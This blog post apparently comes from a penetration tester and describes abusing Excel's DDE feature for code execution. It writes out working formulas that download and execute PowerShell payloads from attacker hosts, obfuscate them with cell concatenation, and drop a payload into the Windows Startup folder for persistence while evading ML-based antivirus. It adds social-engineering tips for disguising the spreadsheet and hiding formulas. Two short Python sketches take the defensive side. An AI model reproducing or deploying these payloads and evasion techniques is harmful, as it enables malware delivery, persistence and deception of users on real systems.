Malicious Excel DDE Execution with ML AV Bypass and Persistence

Introduction

If you've been living under a rock for the past month or two, you haven't heard of DDE. That's OK, I like rocks (they rock). DDE (Dynamic Data Exchange) is an attack vector, er I mean feature, in Microsoft Office products that allows for arbitrary code execution when a user clicks through some warnings. It's been noted that this is not much different than macro code execution, but there are a few key differences. In particular, macro code execution attacks have been around since the late 90s (and yeah they're still a big problem somehow - side note, has anyone actually ever used a legitimate macro-enabled document?) while abusing DDE is a relatively new phenomenon. This post outlines a few obfuscation techniques that I have yet to see, particularly in Microsoft Excel.

Obfuscation

Obfuscation from signature-based AV is extremely easy. Sig-based AV should die a slow and painful death already; why it is still accepted as a "security tool" is confusing to me. It does nothing. Pad an exe with some nops and you'll bypass 90% (made up stat) of sig-based AV.

Anyway, my first crack at playing with DDE exploits was the following, copied directly from SensePost:

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://evilserver.com/sp.base64\");powershell -e $e'!A1

This is pretty basic: it downloads a base64-encoded payload and executes it by calling powershell from the command line from Excel (bit confusing, huh?). My next test was adapted from a technique I read in the Null Byte blog:

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c powershell.exe -nop -w 1 $e=(New-Object System.Net.WebClient).DownloadString(\"http://malicious.server.com/payload.txt\"); IEX $e'!_xlbgnm.A1

This does almost the exact same thing (the payload in this case is not b64 encoded) with one important difference. Instead of calling cmd directly, it calls a new instance of Excel to call the command line to call powershell to download a powershell payload and execute said payload (phew). You might ask why this is done. The reason is simple: from a social engineering standpoint, it's easier to trick a user. Check out the difference side by side, er up by down or whatever:

cmd DDE code exec warning (credit to Null Byte blog)

Excel DDE code exec warning (credit to Null Byte blog)

Which would you trust? With a little social engineering both are passable, but the second is the better of the two. However, we haven't yet gotten much into antivirus evasion, and I've seen little work on this specific to Excel (most blogs seem to be concentrating on Word - IMO spreadsheets are more trusted in organizations because, in my experience, Word docs are always the first thing that comes up in security training). First up is signature-based AV. Although most AV products aren't picking up on anything DDE AFAIK, it's important to look forward and make your exploit robust against future detection.

The technique I thought to use was splitting up strings with string concatenation functions in Excel from other cells. Here is what my spreadsheet looks like:

Excel DDE code obfuscation with string concatenation

See what's going on there? I've added some letters to other cells and used string concatenation to obfuscate the more suspicious looking stuff (cmd.exe, powershell.exe and the IEX powershell command). Of course this could be extended to obfuscate the entire thing should we want to. This, mixed with the CMD->MSEXCEL trick, provides solid obfuscation from standard AV. Pretty easy, huh?
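To make the "why" a bit more concrete, here's a minimal Python sketch of the scanner's side of things. It is an illustration only, not something from my testing: the signature list, the cell contents and the helper names are all made up, and real AV engines are obviously more involved. It shows a raw-text signature missing a split-up string, and the same signature hitting once the cell references are resolved first.

```python
import re

# Hypothetical signature list; real AV signatures are not public.
SIGNATURES = ["powershell.exe", "cmd.exe"]

def resolve_concat(formula, cells):
    """Resolve a simple '&'-joined expression of quoted literals and cell refs.

    Limitation: splits on every '&', so literals containing '&' are not handled.
    """
    parts = []
    for token in formula.split("&"):
        token = token.strip()
        if len(token) >= 2 and token.startswith('"') and token.endswith('"'):
            parts.append(token[1:-1])            # quoted string literal
        elif re.fullmatch(r"[A-Z]+[0-9]+", token):
            parts.append(cells.get(token, ""))   # cell reference, empty if unset
        else:
            parts.append(token)                  # anything else is kept verbatim
    return "".join(parts)

def matches_signature(text):
    """Case-insensitive substring match against the signature list."""
    lowered = text.lower()
    return any(sig in lowered for sig in SIGNATURES)

# Assumed cell contents, mirroring the "letters in other cells" idea above.
cells = {"B1": "o", "C1": "x"}
formula = '"p" & B1 & "wershell.e" & C1 & "e"'

raw_hit = matches_signature(formula)        # signature applied to the raw formula text
resolved = resolve_concat(formula, cells)   # what the formula evaluates to
resolved_hit = matches_signature(resolved)  # signature applied after resolving cells
```

The takeaway for anyone writing detections: matching on the formula text as stored is not enough, the references have to be evaluated (or at least resolved) before any string matching happens.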

Why it's still not enough

As I mentioned, signature-based AV can be bypassed using the above techniques, and these techniques even incorporate a little bit of social engineering. As an attacker, this leaves you in a good place. One problem though: what about machine learning-based AV (ML AV)? My concerns were realized when I attempted to run this on a Windows machine with SEP Cloud on it (an ML-based AV) and it immediately picked it up. My guess is there is some sandboxing going on that runs the code and picks up on the obviously suspicious download and execute commands. No es bueno, this is too obviously a malicious program running to anything with a vague notion of intelligence.

At HG we work a lot with ML. I'm no expert myself, but knowing how it works is important to our projects, and being able to speak intelligently to our team without sounding totally ignorant is a must. For AV, ML works by taking malicious executables as training data for a statistical model. If your executable is "close enough" or rather acts like these executables within a statistical margin of error, you get flagged. This sucks for us hackers/pen testers - before this we could just write our own little rev shell executable and be confident that it would not be picked up.

So what do we do now? We need to fuck their model, or rather evade their model - this is a bit harder than signature-based AV, but still definitely possible. There are a few paths we can go down. My first thought was throwing in garbage commands that one would find in common programs, maybe move some stuff around the filesystem, have some if/thens in there that don't really do a whole lot, and generally just try to fuck their model by giving it normal programmy stuff. Statistically speaking, the malicious part would be buried in normal programs, which may be enough to do the trick. But that sounded like a whole thing, so I went the lazy way - do less. Instead of downloading and executing, what if we just downloaded? Surely no AV could flag a program simply for downloading something, nearly all programs do that. So check out the code I used:

=cmd|'/c p & B1 & wershell.e & C1 & e -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://malicious.server.com/payload.txt\"); Set-Content -Path \"..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\whatevs.cmd\" -Value $e '!_xlbgnm.A1

The above is pretty similar to what we did before, except instead of executing anything we're simply downloading a string and writing to the Windows Startup folder. The next reboot will execute whatevs.cmd for us (note: whatevs.cmd must also be able to achieve AV bypass on its own - but that's out of scope of this post) and also provide persistence for us. Let's scan a spreadsheet with the above code using SEP Cloud:

Excel DDE code bypassing ML AV

Boom. Bypass'd.

Mo' Bypass Mo' Problems?

So everything is groovy right? Well... maybe ¯\_(ツ)_/¯. So far we're in a good place, bypassing AVs like mofos and popping shells. But, in some instances the Startup folder may be locked down. Or another ML-based AV with different training data or a different classifier might pick up stuff copying to the Startup folder (though again, that's not a rarity for many normal programs and we're not actually exploiting any overflows or doing any kind of memory corruption or even priv esc attempts, just running stuff as a user). So maybe we are sorta groovy, but don't forget to do your reconnaissance before trying to use this.

The above techniques are actually way overkill in some situations - many major organizations (government and private) are still using signature-based AV and AFAIK they are not required by any security standards to use ML-based AV. This means a lot of organizations are likely still using Windows Defender (signature-based), just because it checks the box and it comes already installed on Windows (hooray security by box-checking!). In other situations, however, you want to test against the AV that your target organization is using. Some social engineering or something of the like would be very valuable here.

In other words, nothing outlined here excuses you from doing recon on your target before throwing stuff at it.

A quick word about debugging DDE code

It sucks. It's easy to get lost trying to escape Excel, cmd and powershell code in an Excel formula. Quotes are in weird places, double quotes are in even weirder places. Oftentimes a formula will just fail when everything seemingly appears fine (to me). The trick I use is to build up the command, testing early and often and introducing tiny tiny new snippets at a time. That way at least if you don't know WHAT is wrong, you know WHERE it is wrong. Still, it sucks and I never thought I would miss tracebacks so much...

The Implication

So what does all of this imply?

Excel DDE code bypassing ML AV

Well, we've shown that DDE in Excel is rich with functions that allow for AV bypass. The world is your oyster. Another technique that can be used (not demonstrated here - left as an exercise to the reader :) is to use the Excel CHAR() function. This function allows you to use the decimal (NOT hex) ASCII value of characters in place of the actual character, yet another way to break up your formulas. I'm sure there are a ton of other Excel functions I haven't even considered that could hide your intentions from AV. In other words, AV sucks against DDE. I read a blog post about how DDE was no more dangerous than macros blah blah blah - perhaps they are similar, but IMO DDE is far richer in terms of options for obfuscation, and the fact that the prompts shown to the user aren't labeled as security warnings IS a big deal, not a minor detail. People click through security warnings like they are playing Fruit Ninja (that's still a thing right?); non-security warnings are basically just accepted.
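For a sense of what CHAR() means for anything trying to read a formula, here's a rough Python sketch of a normalizer that turns CHAR(n) calls back into the characters they stand for. Again, this is an illustration and not a tool I used for this post: the function name is made up, it only handles literal decimal arguments in the printable ASCII range, and everything else is left untouched.

```python
import re

def expand_char_calls(formula):
    """Replace CHAR(n) calls that have a literal decimal argument
    with the quoted character they evaluate to (printable ASCII only)."""
    def repl(match):
        code = int(match.group(1))
        if 32 <= code <= 126:
            return '"' + chr(code) + '"'
        return match.group(0)  # outside printable ASCII: leave the call as-is
    return re.sub(r"CHAR\(\s*(\d+)\s*\)", repl, formula, flags=re.IGNORECASE)

# 99, 109 and 100 are the decimal ASCII codes for 'c', 'm' and 'd'.
expanded = expand_char_calls("CHAR(99) & CHAR(109) & CHAR(100)")
untouched = expand_char_calls("CHAR(300)")
```

A scanner that runs something like this before string matching sees the literal characters instead of a pile of function calls, which is the whole point of normalizing first.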

Finally

These techniques were tested with ESET AV, Symantec Endpoint Protection and Windows Defender. None picked up anything suspicious. More tests against other targets and your experience with these techniques would be awesome. So hit me up on Twitter at @_hyp3ri0n.

Enjoy and please use responsibly. If you want to build on this work, obviously feel free. We'd appreciate a shout out if you use any of our techniques for further research :).

Final note: for social engineering purposes, the color that Excel 2016 uses in its headers is RGB(36,116,38). Here is a picture of my spreadsheet to give you some inspiration (I know it looks shitty and unconvincing, it's for demonstration purposes only - also note the formulas and chars have been blended in with the background so as to not arouse suspicion):

Excel DDE code bypassing ML AV

Now stop reading this and go break some shit (legally and responsibly)!

Alex